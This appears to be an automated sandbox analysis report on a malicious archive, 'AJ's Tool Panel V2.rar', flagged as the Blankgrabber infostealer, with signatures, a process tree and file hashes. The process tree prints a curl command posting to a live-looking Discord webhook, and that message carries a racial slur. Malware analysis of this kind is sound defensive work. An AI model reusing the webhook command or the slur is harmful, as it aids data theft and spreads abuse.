Overview

overview

10

Static

static

10

AJ's Tool ...V2.rar

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    45s
  • max time network
    47s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    05-11-2024 02:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AJ's Tool Panel V2.rar

  • Size

    2KB

  • MD5

    b72c7263ba128f6d12c3ce40812ded9c

  • SHA1

    e31b07db1a3548a64b417ebe7d3295f2a8dc7608

  • SHA256

    1b398f3c7c23e843b6c41e36f0274512faec6612f567202835a30e8394c6ce17

  • SHA512

    e8cce4f71537ebca41db4820850db49b7519f3351b1a8bb62d8db6a2aa3840b38878229c1b7cf831ae57eb02c88cb92b973752f4742f402662901ceacbde0035

Score
10/10
blankgrabberdiscordstealer

Malware Config

Signatures

  • Blankgrabber family
    blankgrabber
  • Detect discord webhook 1 IoCs

    This file contains a discord webhook.

    discord
  • blankgrabber

    Blankgrabber is an infostealer written in Python and packaged with Pyinstaller.

    stealerblankgrabber
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\AJ's Tool Panel V2.rar"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1020
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:4424
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJSLOGO.bat" "
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\system32\chcp.com
        chcp 65001
        2⤵
          PID:936
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJ's TooI Panel V2.bat" "
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:5016
        • C:\Windows\system32\chcp.com
          chcp 65001
          2⤵
            PID:4368
          • C:\Windows\system32\timeout.exe
            timeout /t 2 /nobreak
            2⤵
            • Delays execution with timeout.exe
            PID:4816
          • C:\Windows\system32\chcp.com
            chcp 65001
            2⤵
              PID:3248
            • C:\Windows\system32\curl.exe
              curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"**Suggestion:** 2everyone discord.gg?scamalerts niggers **Discord Username:** discord.gg?scamalerts\"}" "https://discord.com/api/webhooks/1295784698328645662/3QDP-7Fc6EO9y9tG_41a3188mlFefHaezIZHMG51_UBl61VGB0M-O_EV1aVWBM2lXTej"
              2⤵
                PID:3424
              • C:\Windows\system32\chcp.com
                chcp 65001
                2⤵
                  PID:1784

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJ's TooI Panel V2.bat
                Filesize

                7KB

                MD5

                b714f5d0c3315f80931e93370bd4146b

                SHA1

                f1ff2d405282e323c9575d3f3d7620cb83331718

                SHA256

                ab32009a8e419b8a70ad87862f23f10ba007d2c0e8b63c99bc13c2fd62e94d93

                SHA512

                2801d6ea8ef8da31a3aa0ce026a3a9c4027d4710757f84d9b2886a1392072beef90713a81e72fbaf80de062d61cf43febc0561a9f24c0ac0a0f3dd407e7a1aca

                Download Submit

              • C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJSLOGO.bat
                Filesize

                1KB

                MD5

                4dcceb4fddfafcbad51ada85e379551b

                SHA1

                46b881dc521a272728b10c26bddb54517ab8169c

                SHA256

                3de4a6e8f40907ff80e51c67d7cac873c3ceab5f9f737119ca95346b8340a5cd

                SHA512

                d3b0d1454fbfb26c9a28dd56da7ce966ff299de1d9e5a1271f32004665dbb768f18adfef1f9279f7cb438f3a323ce6b00f9ef5cd9cb8b0d80340d8a486fe43d6

                Download Submit